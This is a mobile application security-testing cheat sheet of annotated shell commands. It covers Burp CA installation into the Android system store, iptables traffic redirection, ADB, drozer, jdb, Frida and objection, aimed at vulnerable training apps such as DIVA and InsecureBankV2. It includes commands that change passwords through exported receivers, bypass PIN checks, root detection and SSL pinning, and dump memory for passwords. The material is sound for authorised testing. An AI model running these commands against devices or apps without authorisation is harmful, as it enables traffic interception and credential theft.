Mobile Testing 2

Dynamic Analysis

Traffic Interception

Add Proxy Certificate

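# Convert the proxy CA certificate exported from Burp (DER) to PEM, and name the
# file by its subject hash, which is how the Android system trust store indexes
# CA files. Apps targeting API 24+ ignore USER-added CAs unless they opt in via a
# network security config, which is why the cert later goes into the SYSTEM store.
openssl x509 -inform DER -in cert -outform PEM -out cacert.pem
# Android looks CA files up by the OLD (MD5-based) subject hash, hence
# -subject_hash_old rather than -subject_hash. -noout suppresses the PEM body so
# only the hash line is printed; head -1 is kept as a belt-and-braces guard.
NUM=$(openssl x509 -inform PEM -subject_hash_old -noout -in cacert.pem | head -1)
# The hash (9a5ba575 for a typical Burp CA) is specific to the certificate you
# exported -- derive it here rather than hard-coding it in later commands.
mv cacert.pem "$NUM.0"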

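# Insert the proxy CA into the SYSTEM trust store (requires root). The file name
# must be the subject hash computed above ($NUM.0); 9a5ba575.0 is merely what
# that hash happens to be for a typical Burp CA, so use the variable instead.
adb devices
adb push "$NUM.0" /sdcard/
# Remount /system read-write. On Android 10+ /system is part of a read-only
# system-as-root image and this plain remount generally fails; a Magisk module
# that overlays /system/etc/security/cacerts is the usual route there.
adb shell "su -c 'mount -o rw,remount /system'"
adb shell "su -c 'mv /sdcard/$NUM.0 /system/etc/security/cacerts/'"
# Match the ownership and mode of the existing CA files (root:root, 0644);
# a file with the wrong owner/mode may not be picked up by the store.
adb shell "su -c 'chown root:root /system/etc/security/cacerts/$NUM.0'"
adb shell "su -c 'chmod 644 /system/etc/security/cacerts/$NUM.0'"
adb shell "su -c 'ls -l /system/etc/security/cacerts/$NUM.0'"
# Reboot so the trust store is re-read; verify afterwards under
# Settings > Security > Trusted credentials > System.
adb shell "su -c 'reboot'"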

Forward Traffic

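# Transparently redirect the device's outbound TCP traffic on selected ports to
# the intercepting proxy. PROXY must be reachable from the device (same lab
# network) and the proxy listener must be configured for invisible/transparent
# proxying, because the client never learns it is talking to a proxy.
PROXY=192.168.222.70:8080
# Flush previous rules in the nat OUTPUT chain first so stale redirects from an
# earlier session do not stack up (this also drops any other nat OUTPUT rules).
adb shell "su -c 'iptables -t nat -F OUTPUT'"
# Same DNAT rule for every port of interest: HTTP, HTTPS and the app-specific
# ports seen in this engagement (8080, 7000, 7001, 7003, 7777).
for PORT in 80 443 8080 7000 7001 7003 7777; do
  adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport $PORT -j DNAT --to-destination $PROXY'"
done
# Verify: -n skips slow reverse-DNS lookups, --line-numbers helps targeted deletion.
adb shell "su -c 'iptables -t nat -L OUTPUT -n -v --line-numbers'"
# Clean up when finished, otherwise the device keeps sending traffic to PROXY
# (and loses connectivity as soon as the proxy host goes away):
#   adb shell "su -c 'iptables -t nat -F OUTPUT'"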

Essential Tools

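# ADB basics
adb devices
# Target one device when several are attached (USB serial or host:port)
adb -s ce0617160cdf473601 shell
# Wireless adb: run `adb tcpip 5555` over USB first. The TCP listener is then
# reachable by anyone on that network, so only use it on an isolated lab network
# and switch back with `adb usb` when done.
adb connect 192.168.1.10:5555
adb -s 192.168.1.10:5555 shell
adb push note.txt /sdcard/
adb pull /sdcard/note.txt
adb install appname.apk
adb uninstall package_name
# Android 8+ ships toybox ps, which lists only the caller's own processes by
# default; -A lists every process so the app's PID is actually visible.
adb shell ps -A | grep -i appname
# Filter logcat by the PID found above (newer logcat also accepts --pid=<pid>)
adb shell logcat | grep -i 19586
# Hunt for secrets leaked to the log; the pattern is deliberately broad and
# case-insensitive, expect noise.
adb shell logcat | grep -i "http\|https\|cookie\|login\|md5\|sha1\|auth\|pass"
# Port forward host -> device; jdwp:<pid> can replace tcp:<device port> for debugging
adb forward tcp:<host port> tcp:<device port>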

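# Package Manager
adb shell pm list packages
# -f shows the APK path; the trailing string filters packages by substring
adb shell pm list packages -f google
# -3: third-party (non-system) packages only
adb shell pm list packages -3 | sort
# Prints "package:<path>" for each APK of the package (several lines for split APKs)
adb shell pm path jakhar.aseem.diva
# The install directory suffix (-1, -2, or a random ~~xyz==/ directory on newer
# Android) varies per install, so take the path from pm path instead of guessing
# /data/app/jakhar.aseem.diva-1/base.apk. tr strips the CR some adb builds emit.
adb shell pm path jakhar.aseem.diva | sed 's/^package://' | tr -d '\r' | while read -r APK; do adb pull "$APK"; done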

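# Activity Manager -- prefixed with adb shell for consistency with the pm
# commands above (drop the prefix when already inside an adb shell session).
# Start an activity explicitly by component name
adb shell am start -n package_name/.activity_name
# Start by implicit intent action; reaches components whose intent-filter is exported
adb shell am start -a jakhar.aseem.diva.action.VIEW_CREDS
# Pass an extra: here the activity trusts a caller-supplied boolean to skip its PIN check
adb shell am start -a jakhar.aseem.diva.action.VIEW_CREDS2 --ez "check_pin" false
# Receiver that changes a password from caller-supplied extras; if the receiver
# is exported, any app on the device can send the same broadcast.
adb shell am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver -a theBroadcast --es phonenumber 4444 --es newpass 123456
# Query a content provider directly (no app-side permission check if it is exported without one)
adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes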

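# SQLite -- app databases normally live under /data/data/<pkg>/databases/ and
# need root or run-as (below) to read. Typo fixed: the binary is sqlite3.
sqlite3 database_name
.tables
.schema table_name
select * from table_name;
.quit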

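# Run-As: switch to the app's own uid without root (run inside adb shell).
# Only works when the app is marked android:debuggable="true"; otherwise
# run-as refuses with a "not debuggable" error.
run-as jakhar.aseem.diva
run-as jakhar.aseem.diva whoami
# With the app's uid its private data directory is readable, e.g.:
run-as jakhar.aseem.diva ls -la /data/data/jakhar.aseem.diva/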

Debug & Backup Flags

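# If android:debuggable="true" (inspect the manifest with apktool/aapt, or use drozer below)

# Drozer: attack surface of a single package (the example target here is
# drozer's own agent package, com.mwr.dz -- substitute the app under test)
run app.package.attacksurface com.mwr.dz

# Drozer: list every debuggable package on the device
run app.package.debuggable

# JDB: attach a Java debugger to the running process over JDWP.
# `adb jdwp` lists only the PIDs that accept a debugger, a quicker check than ps.
adb jdwp
adb shell ps -A | grep package_name
# process_id = 13907 in the example (shell has no // comments -- use #)
adb forward tcp:7777 jdwp:process_id
jdb -attach localhost:7777
> classes
> methods com.android.insecurebankv2.LoginActivity
> stop in com.android.insecurebankv2.LoginActivity.createUser()
> step
> locals
> set text = "Hacked!!!"
> run
# NOTE: when attached to an already running VM, `cont` is the command that
# resumes after a breakpoint; `run` is for a VM that jdb launched itself.

# JDB one-liners: pipe a single command in and filter the output
echo "classes" | jdb -attach localhost:7777 | grep package_name
echo "methods com.android.insecurebankv2.LoginActivity" | jdb -attach localhost:7777 | grep package_name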

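# If android:allowBackup="true" (the attribute defaults to true when absent).
# Android 12+ only backs up app data this way for debuggable apps, so expect an
# empty archive on recent devices unless the app is debuggable.

# Extract: back up one package's data (confirm "Back up my data" on the device);
# -f makes the output file explicit (backup.ab is also the default).
adb backup -f backup.ab com.android.insecurebankv2

# https://sourceforge.net/projects/adbextractor/
# Convert to tar using abe; the last argument is the backup password chosen on
# the device -- pass "" when no password was set.
java -jar abe.jar unpack backup.ab backup.tar password
tar xvf backup.tar

# Convert to tar using dd and python -- UNENCRYPTED backups only. The 24-byte
# header is "ANDROID BACKUP\n<version>\n1\nnone\n" followed by raw zlib data.
# Python 3 form: read/write the binary stdio buffers (the str-based
# sys.stdout.write form only works on Python 2).
dd if=backup.ab bs=1 skip=24 | python3 -c "import zlib,sys;sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))" > backup.tar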

Drozer

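# Install the drozer console on Linux and the drozer agent on the device.
# Ideally pair matching console and agent versions; the 2.4.4 console / 2.3.4
# agent combination here is what was available at the time -- check the
# project's release page for a current matching pair.
wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb
dpkg -i drozer_2.4.4.deb

# Drozer agent apk
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb install drozer-agent-2.3.4.apk

# Start the embedded server from the agent app on the device, then forward its
# port (31415) to the host and attach the console.
adb forward tcp:31415 tcp:31415
drozer console connect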

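# Drozer console commands (the en-dash characters in the original -f / -a
# options were mis-encoded; drozer expects plain ASCII hyphens).

# List all the installed packages
run app.package.list

# Find the package name of a specific app
run app.package.list -f (string to be searched)

# See basic information
run app.package.info -a (package name)

# Identify the exported application components (activities, services,
# receivers, providers, and whether the package is debuggable)
run app.package.attacksurface (package name)

# Identify the list of exported Activities
run app.activity.info -a (package name)

# Launch the exported Activities
run app.activity.start --component (package name) (component name)

# Identify the list of exported Services
run app.service.info -a (package name)

# Identify the list of exported Broadcast receivers
run app.broadcast.info -a (package name)

# Send a message to a Broadcast receiver -- same attack as the am broadcast
# example earlier, but from the (unprivileged) agent app's context, which is the
# realistic attacker position.
run app.broadcast.send --action (broadcast intent filter) --extra string phonenumber 4444 --extra string newpass 123456

# Content providers: enumerate, discover URIs, then query
run app.provider.info -a jakhar.aseem.diva
run scanner.provider.finduris -a jakhar.aseem.diva
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/

# Detect SQL injections in content providers
run scanner.provider.injection -a (package name)

# Detect Directory Traversal in content providers
run scanner.provider.traversal -a com.mwr.example.sieve

# Sniff Broadcast: register a receiver for the action and print what other
# apps send to it
run app.broadcast.sniff --action "theBroadcast"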

Frida

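# Frida server: push the binary matching the device ABI (x86_64 here, i.e. an
# emulator; arm64 for most phones) and the client version (`frida --version`);
# a mismatched client/server pair fails to connect.
adb push frida-server-14.0.8-android-x86_64 /data/local/tmp/
adb shell "su -c 'chmod 755 /data/local/tmp/frida-server-14.0.8-android-x86_64'"
# Run as root so frida can attach to any process
adb shell "su -c '/data/local/tmp/frida-server-14.0.8-android-x86_64 &'"

# Root detection bypass script: -f spawns the app so the hooks are in place
# before its own checks run; --no-pause resumes it immediately.
frida -U -f package_name -l root_bypass.js --no-pause

# SSL certificate pinning bypass script
frida -U -f package_name -l frida-android-repinning_sa.js --no-pause
# NOTE: recent Frida releases resume spawned processes by default and may reject
# --no-pause; drop the flag there.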

Objection

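# Objection (attach with: objection -g package_name explore). Everything below
# except the strings/grep line runs inside the objection REPL.
env
pwd
ls
file cat SharedPreferences.xml
# Prefixing with ! runs any system command on the device
!whoami
android hooking list activities
android hooking search classes (keyword)
android hooking list class_methods com.android.insecurebankv2.LoginActivity
# Watch a method and print its return value each time it is called
android hooking watch class_method com.android.insecurebankv2.LoginActivity.doesSUexist --dump-return
# Force the root check to report "no su binary"
android hooking set return_value com.android.insecurebankv2.PostLogin.doesSUexist false
# Typo fixed: the subcommand is launch_activity
android intent launch_activity com.android.insecurebankv2.PostLogin
memory dump all result.dump
# Run on the HOST against the dumped file
strings result.dump | grep -i "password"
android sslpinning disable
android root disable
# Typo fixed: the subcommand is simulate (fakes a rooted device to test the app's reaction)
android root simulate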
